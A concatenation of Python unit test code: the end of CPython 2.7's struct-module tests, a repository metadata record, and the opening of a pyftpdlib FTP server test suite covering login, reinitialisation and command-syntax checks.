self.assertEqual((struct.pack('=i', 1)[0] == chr(0)), ISBIGENDIAN)
def test_consistence(self):
self.assertRaises(struct.error, struct.calcsize, 'Z')
sz = struct.calcsize('i')
self.assertEqual(sz * 3, struct.calcsize('iii'))
fmt = 'cbxxxxxxhhhhiillffd?'
fmt3 = '3c3b18x12h6i6l6f3d3?'
sz = struct.calcsize(fmt)
sz3 = struct.calcsize(fmt3)
self.assertEqual(sz * 3, sz3)
self.assertRaises(struct.error, struct.pack, 'iii', 3)
self.assertRaises(struct.error, struct.pack, 'i', 3, 3, 3)
self.assertRaises((TypeError, struct.error), struct.pack, 'i', 'foo')
self.assertRaises((TypeError, struct.error), struct.pack, 'P', 'foo')
self.assertRaises(struct.error, struct.unpack, 'd', 'flap')
s = struct.pack('ii', 1, 2)
self.assertRaises(struct.error, struct.unpack, 'iii', s)
self.assertRaises(struct.error, struct.unpack, 'i', s)
def test_transitiveness(self):
c = 'a'
b = 1
h = 255
i = 65535
l = 65536
f = 3.1415
d = 3.1415
t = True
for prefix in ('', '@', '<', '>', '=', '!'):
for format in ('xcbhilfd?', 'xcBHILfd?'):
format = prefix + format
s = struct.pack(format, c, b, h, i, l, f, d, t)
cp, bp, hp, ip, lp, fp, dp, tp = struct.unpack(format, s)
self.assertEqual(cp, c)
self.assertEqual(bp, b)
self.assertEqual(hp, h)
self.assertEqual(ip, i)
self.assertEqual(lp, l)
self.assertEqual(int(100 * fp), int(100 * f))
self.assertEqual(int(100 * dp), int(100 * d))
self.assertEqual(tp, t)
def test_new_features(self):
# Test some of the new features in detail
# (format, argument, big-endian result, little-endian result, asymmetric)
tests = [
('c', 'a', 'a', 'a', 0),
('xc', 'a', '\0a', '\0a', 0),
('cx', 'a', 'a\0', 'a\0', 0),
('s', 'a', 'a', 'a', 0),
('0s', 'helloworld', '', '', 1),
('1s', 'helloworld', 'h', 'h', 1),
('9s', 'helloworld', 'helloworl', 'helloworl', 1),
('10s', 'helloworld', 'helloworld', 'helloworld', 0),
('11s', 'helloworld', 'helloworld\0', 'helloworld\0', 1),
('20s', 'helloworld', 'helloworld'+10*'\0', 'helloworld'+10*'\0', 1),
('b', 7, '\7', '\7', 0),
('b', -7, '\371', '\371', 0),
('B', 7, '\7', '\7', 0),
('B', 249, '\371', '\371', 0),
('h', 700, '\002\274', '\274\002', 0),
('h', -700, '\375D', 'D\375', 0),
('H', 700, '\002\274', '\274\002', 0),
('H', 0x10000-700, '\375D', 'D\375', 0),
('i', 70000000, '\004,\035\200', '\200\035,\004', 0),
('i', -70000000, '\373\323\342\200', '\200\342\323\373', 0),
('I', 70000000L, '\004,\035\200', '\200\035,\004', 0),
('I', 0x100000000L-70000000, '\373\323\342\200', '\200\342\323\373', 0),
('l', 70000000, '\004,\035\200', '\200\035,\004', 0),
('l', -70000000, '\373\323\342\200', '\200\342\323\373', 0),
('L', 70000000L, '\004,\035\200', '\200\035,\004', 0),
('L', 0x100000000L-70000000, '\373\323\342\200', '\200\342\323\373', 0),
('f', 2.0, '@\000\000\000', '\000\000\000@', 0),
('d', 2.0, '@\000\000\000\000\000\000\000',
'\000\000\000\000\000\000\000@', 0),
('f', -2.0, '\300\000\000\000', '\000\000\000\300', 0),
('d', -2.0, '\300\000\000\000\000\000\000\000',
'\000\000\000\000\000\000\000\300', 0),
('?', 0, '\0', '\0', 0),
('?', 3, '\1', '\1', 1),
('?', True, '\1', '\1', 0),
('?', [], '\0', '\0', 1),
('?', (1,), '\1', '\1', 1),
]
for fmt, arg, big, lil, asy in tests:
for (xfmt, exp) in [('>'+fmt, big), ('!'+fmt, big), ('<'+fmt, lil),
('='+fmt, ISBIGENDIAN and big or lil)]:
res = struct.pack(xfmt, arg)
self.assertEqual(res, exp)
self.assertEqual(struct.calcsize(xfmt), len(res))
rev = struct.unpack(xfmt, res)[0]
if rev != arg:
self.assertTrue(asy)
def test_calcsize(self):
expected_size = {
'b': 1, 'B': 1,
'h': 2, 'H': 2,
'i': 4, 'I': 4,
'l': 4, 'L': 4,
'q': 8, 'Q': 8,
}
# standard integer sizes
for code in integer_codes:
for byteorder in ('=', '<', '>', '!'):
format = byteorder+code
size = struct.calcsize(format)
self.assertEqual(size, expected_size[code])
# native integer sizes, except 'q' and 'Q'
for format_pair in ('bB', 'hH', 'iI', 'lL'):
for byteorder in ['', '@']:
signed_size = struct.calcsize(byteorder + format_pair[0])
unsigned_size = struct.calcsize(byteorder + format_pair[1])
self.assertEqual(signed_size, unsigned_size)
# bounds for native integer sizes
self.assertEqual(struct.calcsize('b'), 1)
self.assertLessEqual(2, struct.calcsize('h'))
self.assertLessEqual(4, struct.calcsize('l'))
self.assertLessEqual(struct.calcsize('h'), struct.calcsize('i'))
self.assertLessEqual(struct.calcsize('i'), struct.calcsize('l'))
# tests for native 'q' and 'Q' when applicable
if HAVE_LONG_LONG:
self.assertEqual(struct.calcsize('q'), struct.calcsize('Q'))
self.assertLessEqual(8, struct.calcsize('q'))
self.assertLessEqual(struct.calcsize('l'), struct.calcsize('q'))
def test_integers(self):
# Integer tests (bBhHiIlLqQ).
import binascii
class IntTester(unittest.TestCase):
def __init__(self, format):
super(IntTester, self).__init__(methodName='test_one')
self.format = format
self.code = format[-1]
self.direction = format[:-1]
if not self.direction in ('', '@', '=', '<', '>', '!'):
raise ValueError("unrecognized packing direction: %s" %
self.direction)
self.bytesize = struct.calcsize(format)
self.bitsize = self.bytesize * 8
if self.code in tuple('bhilq'):
self.signed = True
self.min_value = -(2L**(self.bitsize-1))
self.max_value = 2L**(self.bitsize-1) - 1
elif self.code in tuple('BHILQ'):
self.signed = False
self.min_value = 0
self.max_value = 2L**self.bitsize - 1
else:
raise ValueError("unrecognized format code: %s" %
self.code)
def test_one(self, x, pack=struct.pack,
unpack=struct.unpack,
unhexlify=binascii.unhexlify):
format = self.format
if self.min_value <= x <= self.max_value:
expected = long(x)
if self.signed and x < 0:
expected += 1L << self.bitsize
self.assertGreaterEqual(expected, 0)
expected = '%x' % expected
if len(expected) & 1:
expected = "0" + expected
expected = unhexlify(expected)
expected = ("\x00" * (self.bytesize - len(expected)) +
expected)
if (self.direction == '<' or
self.direction in ('', '@', '=') and not ISBIGENDIAN):
expected = string_reverse(expected)
self.assertEqual(len(expected), self.bytesize)
# Pack work?
got = pack(format, x)
self.assertEqual(got, expected)
# Unpack work?
retrieved = unpack(format, got)[0]
self.assertEqual(x, retrieved)
# Adding any byte should cause a "too big" error.
self.assertRaises((struct.error, TypeError), unpack, format,
'\x01' + got)
else:
# x is out of range -- verify pack realizes that.
self.assertRaises((OverflowError, ValueError, struct.error),
pack, format, x)
def run(self):
from random import randrange
# Create all interesting powers of 2.
values = []
for exp in range(self.bitsize + 3):
values.append(1L << exp)
# Add some random values.
for i in range(self.bitsize):
val = 0L
for j in range(self.bytesize):
val = (val << 8) | randrange(256)
values.append(val)
# Values absorbed from other tests
values.extend([300, 700000, sys.maxint*4])
# Try all those, and their negations, and +-1 from
# them. Note that this tests all power-of-2
# boundaries in range, and a few out of range, plus
# +-(2**n +- 1).
for base in values:
for val in -base, base:
for incr in -1, 0, 1:
x = val + incr
self.test_one(int(x))
self.test_one(long(x))
# Some error cases.
class NotAnIntNS(object):
def __int__(self):
return 42
def __long__(self):
return 1729L
class NotAnIntOS:
def __int__(self):
return 85
def __long__(self):
return -163L
# Objects with an '__index__' method should be allowed
# to pack as integers. That is assuming the implemented
# '__index__' method returns and 'int' or 'long'.
class Indexable(object):
def __init__(self, value):
self._value = value
def __index__(self):
return self._value
# If the '__index__' method raises a type error, then
# '__int__' should be used with a deprecation warning.
class BadIndex(object):
def __index__(self):
raise TypeError
def __int__(self):
return 42
self.assertRaises((TypeError, struct.error),
struct.pack, self.format,
"a string")
self.assertRaises((TypeError, struct.error),
struct.pack, self.format,
randrange)
with check_warnings(("integer argument expected, "
"got non-integer", DeprecationWarning)):
with self.assertRaises((TypeError, struct.error)):
struct.pack(self.format, 3+42j)
# an attempt to convert a non-integer (with an
# implicit conversion via __int__) should succeed,
# with a DeprecationWarning
for nonint in NotAnIntNS(), NotAnIntOS(), BadIndex():
with check_warnings((".*integer argument expected, got non"
"-integer", DeprecationWarning)) as w:
got = struct.pack(self.format, nonint)
lineno = inspect.currentframe().f_lineno - 1
self.assertEqual(w.filename, testmod_filename)
self.assertEqual(w.lineno, lineno)
self.assertEqual(len(w.warnings), 1)
expected = struct.pack(self.format, int(nonint))
self.assertEqual(got, expected)
# Check for legitimate values from '__index__'.
for obj in (Indexable(0), Indexable(10), Indexable(17),
Indexable(42), Indexable(100), Indexable(127)):
try:
struct.pack(format, obj)
except:
self.fail("integer code pack failed on object "
"with '__index__' method")
# Check for bogus values from '__index__'.
for obj in (Indexable('a'), Indexable(u'b'), Indexable(None),
Indexable({'a': 1}), Indexable([1, 2, 3])):
self.assertRaises((TypeError, struct.error),
struct.pack, self.format,
obj)
byteorders = '', '@', '=', '<', '>', '!'
for code in integer_codes:
for byteorder in byteorders:
if (byteorder in ('', '@') and code in ('q', 'Q') and
not HAVE_LONG_LONG):
continue
format = byteorder+code
t = IntTester(format)
t.run()
def test_p_code(self):
# Test p ("Pascal string") code.
for code, input, expected, expectedback in [
('p','abc', '\x00', ''),
('1p', 'abc', '\x00', ''),
('2p', 'abc', '\x01a', 'a'),
('3p', 'abc', '\x02ab', 'ab'),
('4p', 'abc', '\x03abc', 'abc'),
('5p', 'abc', '\x03abc\x00', 'abc'),
('6p', 'abc', '\x03abc\x00\x00', 'abc'),
('1000p', 'x'*1000, '\xff' + 'x'*999, 'x'*255)]:
got = struct.pack(code, input)
self.assertEqual(got, expected)
(got,) = struct.unpack(code, got)
self.assertEqual(got, expectedback)
def test_705836(self):
# SF bug 705836. "<f" and ">f" had a severe rounding bug, where a carry
# from the low-order discarded bits could propagate into the exponent
# field, causing the result to be wrong by a factor of 2.
import math
for base in range(1, 33):
# smaller <- largest representable float less than base.
delta = 0.5
while base - delta / 2.0 != base:
delta /= 2.0
smaller = base - delta
# Packing this rounds away a solid string of trailing 1 bits.
packed = struct.pack("<f", smaller)
unpacked = struct.unpack("<f", packed)[0]
# This failed at base = 2, 4, and 32, with unpacked = 1, 2, and
# 16, respectively.
self.assertEqual(base, unpacked)
bigpacked = struct.pack(">f", smaller)
self.assertEqual(bigpacked, string_reverse(packed))
unpacked = struct.unpack(">f", bigpacked)[0]
self.assertEqual(base, unpacked)
# Largest finite IEEE single.
big = (1 << 24) - 1
big = math.ldexp(big, 127 - 23)
packed = struct.pack(">f", big)
unpacked = struct.unpack(">f", packed)[0]
self.assertEqual(big, unpacked)
# The same, but tack on a 1 bit so it rounds up to infinity.
big = (1 << 25) - 1
big = math.ldexp(big, 127 - 24)
self.assertRaises(OverflowError, struct.pack, ">f", big)
def test_1530559(self):
# SF bug 1530559. struct.pack raises TypeError where it used to convert.
for endian in ('', '>', '<'):
for fmt in integer_codes:
self.check_float_coerce(endian + fmt, 1.0)
self.check_float_coerce(endian + fmt, 1.5)
def test_unpack_from(self, cls=str):
data = cls('abcd01234')
fmt = '4s'
s = struct.Struct(fmt)
self.assertEqual(s.unpack_from(data), ('abcd',))
self.assertEqual(struct.unpack_from(fmt, data), ('abcd',))
for i in xrange(6):
self.assertEqual(s.unpack_from(data, i), (data[i:i+4],))
self.assertEqual(struct.unpack_from(fmt, data, i), (data[i:i+4],))
for i in xrange(6, len(data) + 1):
self.assertRaises(struct.error, s.unpack_from, data, i)
self.assertRaises(struct.error, struct.unpack_from, fmt, data, i)
def test_pack_into(self):
test_string = 'Reykjavik rocks, eow!'
writable_buf = array.array('c', ' '*100)
fmt = '21s'
s = struct.Struct(fmt)
# Test without offset
s.pack_into(writable_buf, 0, test_string)
from_buf = writable_buf.tostring()[:len(test_string)]
self.assertEqual(from_buf, test_string)
# Test with offset.
s.pack_into(writable_buf, 10, test_string)
from_buf = writable_buf.tostring()[:len(test_string)+10]
self.assertEqual(from_buf, test_string[:10] + test_string)
# Go beyond boundaries.
small_buf = array.array('c', ' '*10)
self.assertRaises((ValueError, struct.error), s.pack_into, small_buf, 0,
test_string)
self.assertRaises((ValueError, struct.error), s.pack_into, small_buf, 2,
test_string)
# Test bogus offset (issue 3694)
sb = small_buf
self.assertRaises((TypeError, struct.error), struct.pack_into, b'', sb,
None)
def test_pack_into_fn(self):
test_string = 'Reykjavik rocks, eow!'
writable_buf = array.array('c', ' '*100)
fmt = '21s'
pack_into = lambda *args: struct.pack_into(fmt, *args)
# Test without offset.
pack_into(writable_buf, 0, test_string)
from_buf = writable_buf.tostring()[:len(test_string)]
self.assertEqual(from_buf, test_string)
# Test with offset.
pack_into(writable_buf, 10, test_string)
from_buf = writable_buf.tostring()[:len(test_string)+10]
self.assertEqual(from_buf, test_string[:10] + test_string)
# Go beyond boundaries.
small_buf = array.array('c', ' '*10)
self.assertRaises((ValueError, struct.error), pack_into, small_buf, 0,
test_string)
self.assertRaises((ValueError, struct.error), pack_into, small_buf, 2,
test_string)
def test_unpack_with_buffer(self):
with check_py3k_warnings(("buffer.. not supported in 3.x",
DeprecationWarning)):
# SF bug 1563759: struct.unpack doesn't support buffer protocol objects
data1 = array.array('B', '\x12\x34\x56\x78')
data2 = buffer('......\x12\x34\x56\x78......', 6, 4)
for data in [data1, data2]:
value, = struct.unpack('>I', data)
self.assertEqual(value, 0x12345678)
self.test_unpack_from(cls=buffer)
def test_unpack_with_memoryview(self):
# Bug 10212: struct.unpack doesn't support new buffer protocol objects
data1 = memoryview('\x12\x34\x56\x78')
for data in [data1,]:
value, = struct.unpack('>I', data)
self.assertEqual(value, 0x12345678)
self.test_unpack_from(cls=memoryview)
def test_bool(self):
class ExplodingBool(object):
def __nonzero__(self):
raise IOError
for prefix in tuple("<>!=")+('',):
false = (), [], [], '', 0
true = [1], 'test', 5, -1, 0xffffffffL+1, 0xffffffff//2
falseFormat = prefix + '?' * len(false)
packedFalse = struct.pack(falseFormat, *false)
unpackedFalse = struct.unpack(falseFormat, packedFalse)
trueFormat = prefix + '?' * len(true)
packedTrue = struct.pack(trueFormat, *true)
unpackedTrue = struct.unpack(trueFormat, packedTrue)
self.assertEqual(len(true), len(unpackedTrue))
self.assertEqual(len(false), len(unpackedFalse))
for t in unpackedFalse:
self.assertFalse(t)
for t in unpackedTrue:
self.assertTrue(t)
packed = struct.pack(prefix+'?', 1)
self.assertEqual(len(packed), struct.calcsize(prefix+'?'))
if len(packed) != 1:
self.assertFalse(prefix, msg='encoded bool is not one byte: %r'
%packed)
self.assertRaises(IOError, struct.pack, prefix + '?',
ExplodingBool())
for c in [b'\x01', b'\x7f', b'\xff', b'\x0f', b'\xf0']:
self.assertTrue(struct.unpack('>?', c)[0])
@unittest.skipUnless(IS32BIT, "Specific to 32bit machines")
def test_crasher(self):
self.assertRaises(MemoryError, struct.pack, "357913941c", "a")
def test_count_overflow(self):
hugecount = '{}b'.format(sys.maxsize+1)
self.assertRaises(struct.error, struct.calcsize, hugecount)
hugecount2 = '{}b{}H'.format(sys.maxsize//2, sys.maxsize//2)
self.assertRaises(struct.error, struct.calcsize, hugecount2)
def check_sizeof(self, format_str, number_of_codes):
# The size of 'PyStructObject'
totalsize = support.calcobjsize('5P')
# The size taken up by the 'formatcode' dynamic array
totalsize += struct.calcsize('3P') * (number_of_codes + 1)
support.check_sizeof(self, struct.Struct(format_str), totalsize)
@support.cpython_only
def test__sizeof__(self):
for code in integer_codes:
self.check_sizeof(code, 1)
self.check_sizeof('BHILfdspP', 9)
self.check_sizeof('B' * 1234, 1234)
self.check_sizeof('fd', 2)
self.check_sizeof('xxxxxxxxxxxxxx', 0)
self.check_sizeof('100H', 100)
self.check_sizeof('187s', 1)
self.check_sizeof('20p', 1)
self.check_sizeof('0s', 1)
self.check_sizeof('0c', 0)
def test_main():
support.run_unittest(StructTest)
if __name__ == '__main__':
test_main()
|
{
"content_hash": "faf78d619d99d3d0012637902eacd060",
"timestamp": "",
"source": "github",
"line_count": 581,
"max_line_length": 84,
"avg_line_length": 41.5645438898451,
"alnum_prop": 0.4938506770466686,
"repo_name": "Sing-Li/go-buildpack",
"id": "2e613f7577bb79a91736c55c01d863762c3f74d3",
"size": "24149",
"binary": false,
"copies": "38",
"ref": "refs/heads/master",
"path": "builds/runtimes/python-2.7.6/lib/python2.7/test/test_struct.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "247"
},
{
"name": "C",
"bytes": "478618"
},
{
"name": "C++",
"bytes": "2005"
},
{
"name": "Go",
"bytes": "1710"
},
{
"name": "Groff",
"bytes": "43767"
},
{
"name": "HTML",
"bytes": "111577"
},
{
"name": "Makefile",
"bytes": "66321"
},
{
"name": "Python",
"bytes": "16829300"
},
{
"name": "R",
"bytes": "2326"
},
{
"name": "Ruby",
"bytes": "4277"
},
{
"name": "Shell",
"bytes": "22561"
},
{
"name": "Visual Basic",
"bytes": "481"
}
],
"symlink_target": ""
}
|
import contextlib
import errno
import ftplib
import logging
import os
import random
import re
import select
import shutil
import socket
import stat
import sys
import tempfile
import time
import warnings
import mock
from pyftpdlib._compat import b
from pyftpdlib._compat import PY3
from pyftpdlib._compat import u
from pyftpdlib._compat import unicode
from pyftpdlib.filesystems import AbstractedFS
from pyftpdlib.handlers import DTPHandler
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.handlers import SUPPORTS_HYBRID_IPV6
from pyftpdlib.handlers import ThrottledDTPHandler
from pyftpdlib.ioloop import IOLoop
from pyftpdlib.servers import FTPServer
from pyftpdlib.test import BUFSIZE
from pyftpdlib.test import configure_logging
from pyftpdlib.test import disable_log_warning
from pyftpdlib.test import FTPd
from pyftpdlib.test import HOME
from pyftpdlib.test import HOST
from pyftpdlib.test import INTERRUPTED_TRANSF_SIZE
from pyftpdlib.test import OSX
from pyftpdlib.test import PASSWD
from pyftpdlib.test import POSIX
from pyftpdlib.test import remove_test_files
from pyftpdlib.test import retry_before_failing
from pyftpdlib.test import safe_mkdir
from pyftpdlib.test import safe_remove
from pyftpdlib.test import safe_rmdir
from pyftpdlib.test import SUPPORTS_IPV4
from pyftpdlib.test import SUPPORTS_IPV6
from pyftpdlib.test import SUPPORTS_SENDFILE
from pyftpdlib.test import TESTFN
from pyftpdlib.test import TESTFN_UNICODE
from pyftpdlib.test import TESTFN_UNICODE_2
from pyftpdlib.test import TIMEOUT
from pyftpdlib.test import touch
from pyftpdlib.test import TRAVIS
from pyftpdlib.test import USER
from pyftpdlib.test import VERBOSITY
from pyftpdlib.test import WINDOWS
import pyftpdlib.__main__
try:
from StringIO import StringIO as BytesIO
except ImportError:
from io import BytesIO
try:
import ssl
except ImportError:
ssl = None
if sys.version_info < (2, 7):
import unittest2 as unittest # pip install unittest2
else:
import unittest
if not hasattr(unittest.TestCase, "assertRaisesRegex"):
unittest.TestCase.assertRaisesRegex = unittest.TestCase.assertRaisesRegexp
sendfile = None
if POSIX:
try:
import sendfile
except ImportError:
pass
class TestFtpAuthentication(unittest.TestCase):
"test: USER, PASS, REIN."
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.handler.auth_failed_timeout = 0.001
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.file = open(TESTFN, 'w+b')
self.dummyfile = BytesIO()
def tearDown(self):
self.server.handler.auth_failed_timeout = 5
self.client.close()
self.server.stop()
if not self.file.closed:
self.file.close()
if not self.dummyfile.closed:
self.dummyfile.close()
os.remove(TESTFN)
def assert_auth_failed(self, user, passwd):
self.assertRaisesRegex(ftplib.error_perm, '530 Authentication failed',
self.client.login, user, passwd)
def test_auth_ok(self):
self.client.login(user=USER, passwd=PASSWD)
def test_anon_auth(self):
self.client.login(user='anonymous', passwd='anon@')
self.client.login(user='anonymous', passwd='')
# supposed to be case sensitive
self.assert_auth_failed('AnoNymouS', 'foo')
# empty passwords should be allowed
self.client.sendcmd('user anonymous')
self.client.sendcmd('pass ')
self.client.sendcmd('user anonymous')
self.client.sendcmd('pass')
def test_auth_failed(self):
self.assert_auth_failed(USER, 'wrong')
self.assert_auth_failed('wrong', PASSWD)
self.assert_auth_failed('wrong', 'wrong')
def test_wrong_cmds_order(self):
self.assertRaisesRegex(ftplib.error_perm, '503 Login with USER first',
self.client.sendcmd, 'pass ' + PASSWD)
self.client.login(user=USER, passwd=PASSWD)
self.assertRaisesRegex(ftplib.error_perm,
"503 User already authenticated.",
self.client.sendcmd, 'pass ' + PASSWD)
def test_max_auth(self):
self.assert_auth_failed(USER, 'wrong')
self.assert_auth_failed(USER, 'wrong')
self.assert_auth_failed(USER, 'wrong')
# If authentication fails for 3 times ftpd disconnects the
# client. We can check if that happens by using self.client.sendcmd()
# on the 'dead' socket object. If socket object is really
# closed it should be raised a socket.error exception (Windows)
# or a EOFError exception (Linux).
self.client.sock.settimeout(.1)
self.assertRaises((socket.error, EOFError), self.client.sendcmd, '')
def test_rein(self):
self.client.login(user=USER, passwd=PASSWD)
self.client.sendcmd('rein')
# user not authenticated, error response expected
self.assertRaisesRegex(ftplib.error_perm,
'530 Log in with USER and PASS first',
self.client.sendcmd, 'pwd')
# by logging-in again we should be able to execute a
# file-system command
self.client.login(user=USER, passwd=PASSWD)
self.client.sendcmd('pwd')
@retry_before_failing()
def test_rein_during_transfer(self):
# Test REIN while already authenticated and a transfer is
# in progress.
self.client.login(user=USER, passwd=PASSWD)
data = b'abcde12345' * 1000000
self.file.write(data)
self.file.close()
conn = self.client.transfercmd('retr ' + TESTFN)
self.addCleanup(conn.close)
rein_sent = False
bytes_recv = 0
while 1:
chunk = conn.recv(BUFSIZE)
if not chunk:
break
bytes_recv += len(chunk)
self.dummyfile.write(chunk)
if bytes_recv > INTERRUPTED_TRANSF_SIZE and not rein_sent:
rein_sent = True
# flush account, error response expected
self.client.sendcmd('rein')
self.assertRaisesRegex(ftplib.error_perm,
'530 Log in with USER and PASS first',
self.client.dir)
# a 226 response is expected once tranfer finishes
self.assertEqual(self.client.voidresp()[:3], '226')
# account is still flushed, error response is still expected
self.assertRaisesRegex(ftplib.error_perm,
'530 Log in with USER and PASS first',
self.client.sendcmd, 'size ' + TESTFN)
# by logging-in again we should be able to execute a
# filesystem command
self.client.login(user=USER, passwd=PASSWD)
self.client.sendcmd('pwd')
self.dummyfile.seek(0)
datafile = self.dummyfile.read()
self.assertEqual(len(data), len(datafile))
self.assertEqual(hash(data), hash(datafile))
def test_user(self):
# Test USER while already authenticated and no transfer
# is in progress.
self.client.login(user=USER, passwd=PASSWD)
self.client.sendcmd('user ' + USER) # authentication flushed
self.assertRaisesRegex(ftplib.error_perm,
'530 Log in with USER and PASS first',
self.client.sendcmd, 'pwd')
self.client.sendcmd('pass ' + PASSWD)
self.client.sendcmd('pwd')
def test_user_during_transfer(self):
# Test USER while already authenticated and a transfer is
# in progress.
self.client.login(user=USER, passwd=PASSWD)
data = b'abcde12345' * 1000000
self.file.write(data)
self.file.close()
conn = self.client.transfercmd('retr ' + TESTFN)
self.addCleanup(conn.close)
rein_sent = 0
bytes_recv = 0
while 1:
chunk = conn.recv(BUFSIZE)
if not chunk:
break
bytes_recv += len(chunk)
self.dummyfile.write(chunk)
# stop transfer while it isn't finished yet
if bytes_recv > INTERRUPTED_TRANSF_SIZE and not rein_sent:
rein_sent = True
# flush account, expect an error response
self.client.sendcmd('user ' + USER)
self.assertRaisesRegex(ftplib.error_perm,
'530 Log in with USER and PASS first',
self.client.dir)
# a 226 response is expected once transfer finishes
self.assertEqual(self.client.voidresp()[:3], '226')
# account is still flushed, error response is still expected
self.assertRaisesRegex(ftplib.error_perm,
'530 Log in with USER and PASS first',
self.client.sendcmd, 'pwd')
# by logging-in again we should be able to execute a
# filesystem command
self.client.sendcmd('pass ' + PASSWD)
self.client.sendcmd('pwd')
self.dummyfile.seek(0)
datafile = self.dummyfile.read()
self.assertEqual(len(data), len(datafile))
self.assertEqual(hash(data), hash(datafile))
class TestFtpDummyCmds(unittest.TestCase):
"test: TYPE, STRU, MODE, NOOP, SYST, ALLO, HELP, SITE HELP"
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
def tearDown(self):
self.client.close()
self.server.stop()
def test_type(self):
self.client.sendcmd('type a')
self.client.sendcmd('type i')
self.client.sendcmd('type l7')
self.client.sendcmd('type l8')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'type ?!?')
def test_stru(self):
self.client.sendcmd('stru f')
self.client.sendcmd('stru F')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'stru p')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'stru r')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'stru ?!?')
def test_mode(self):
self.client.sendcmd('mode s')
self.client.sendcmd('mode S')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'mode b')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'mode c')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'mode ?!?')
def test_noop(self):
self.client.sendcmd('noop')
def test_syst(self):
self.client.sendcmd('syst')
def test_allo(self):
self.client.sendcmd('allo x')
def test_quit(self):
self.client.sendcmd('quit')
def test_help(self):
self.client.sendcmd('help')
cmd = random.choice(list(FTPHandler.proto_cmds.keys()))
self.client.sendcmd('help %s' % cmd)
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'help ?!?')
def test_site(self):
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'site')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'site ?!?')
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'site foo bar')
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'sitefoo bar')
def test_site_help(self):
self.client.sendcmd('site help')
self.client.sendcmd('site help help')
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'site help ?!?')
def test_rest(self):
# Test error conditions only; resumed data transfers are
# tested later.
self.client.sendcmd('type i')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'rest')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'rest str')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'rest -1')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'rest 10.1')
# REST is not supposed to be allowed in ASCII mode
self.client.sendcmd('type a')
self.assertRaisesRegex(ftplib.error_perm, 'not allowed in ASCII mode',
self.client.sendcmd, 'rest 10')
def test_feat(self):
resp = self.client.sendcmd('feat')
self.assertTrue('UTF8' in resp)
self.assertTrue('TVFS' in resp)
def test_opts_feat(self):
self.assertRaises(
ftplib.error_perm, self.client.sendcmd, 'opts mlst bad_fact')
self.assertRaises(
ftplib.error_perm, self.client.sendcmd, 'opts mlst type ;')
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'opts not_mlst')
# utility function which used for extracting the MLST "facts"
# string from the FEAT response
def mlst():
resp = self.client.sendcmd('feat')
return re.search(r'^\s*MLST\s+(\S+)$', resp, re.MULTILINE).group(1)
# we rely on "type", "perm", "size", and "modify" facts which
# are those available on all platforms
self.assertTrue('type*;perm*;size*;modify*;' in mlst())
self.assertEqual(self.client.sendcmd(
'opts mlst type;'), '200 MLST OPTS type;')
self.assertEqual(self.client.sendcmd(
'opts mLSt TypE;'), '200 MLST OPTS type;')
self.assertTrue('type*;perm;size;modify;' in mlst())
self.assertEqual(self.client.sendcmd('opts mlst'), '200 MLST OPTS ')
self.assertTrue('*' not in mlst())
self.assertEqual(
self.client.sendcmd('opts mlst fish;cakes;'), '200 MLST OPTS ')
self.assertTrue('*' not in mlst())
self.assertEqual(self.client.sendcmd('opts mlst fish;cakes;type;'),
'200 MLST OPTS type;')
self.assertTrue('type*;perm;size;modify;' in mlst())
class TestFtpCmdsSemantic(unittest.TestCase):
server_class = FTPd
client_class = ftplib.FTP
arg_cmds = ['allo', 'appe', 'dele', 'eprt', 'mdtm', 'mode', 'mkd', 'opts',
'port', 'rest', 'retr', 'rmd', 'rnfr', 'rnto', 'site', 'size',
'stor', 'stru', 'type', 'user', 'xmkd', 'xrmd', 'site chmod']
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
def tearDown(self):
self.client.close()
self.server.stop()
def test_arg_cmds(self):
# Test commands requiring an argument.
expected = "501 Syntax error: command needs an argument."
for cmd in self.arg_cmds:
self.client.putcmd(cmd)
resp = self.client.getmultiline()
self.assertEqual(resp, expected)
def test_no_arg_cmds(self):
# Test commands accepting no arguments.
expected = "501 Syntax error: command does not accept arguments."
narg_cmds = ['abor', 'cdup', 'feat', 'noop', 'pasv', 'pwd', 'quit',
'rein', 'syst', 'xcup', 'xpwd']
for cmd in narg_cmds:
self.client.putcmd(cmd + ' arg')
resp = self.client.getmultiline()
self.assertEqual(resp, expected)
def test_auth_cmds(self):
# Test those commands requiring client to be authenticated.
expected = "530 Log in with USER and PASS first."
self.client.sendcmd('rein')
for cmd in self.server.handler.proto_cmds:
cmd = cmd.lower()
if cmd in ('feat', 'help', 'noop', 'user', 'pass', 'stat', 'syst',
'quit', 'site', 'site help', 'pbsz', 'auth', 'prot',
'ccc'):
continue
if cmd in self.arg_cmds:
cmd = cmd + ' arg'
self.client.putcmd(cmd)
resp = self.client.getmultiline()
self.assertEqual(resp, expected)
def test_no_auth_cmds(self):
# Test those commands that do not require client to be authenticated.
self.client.sendcmd('rein')
for cmd in ('feat', 'help', 'noop', 'stat', 'syst', 'site help'):
self.client.sendcmd(cmd)
# STAT provided with an argument is equal to LIST hence not allowed
# if not authenticated
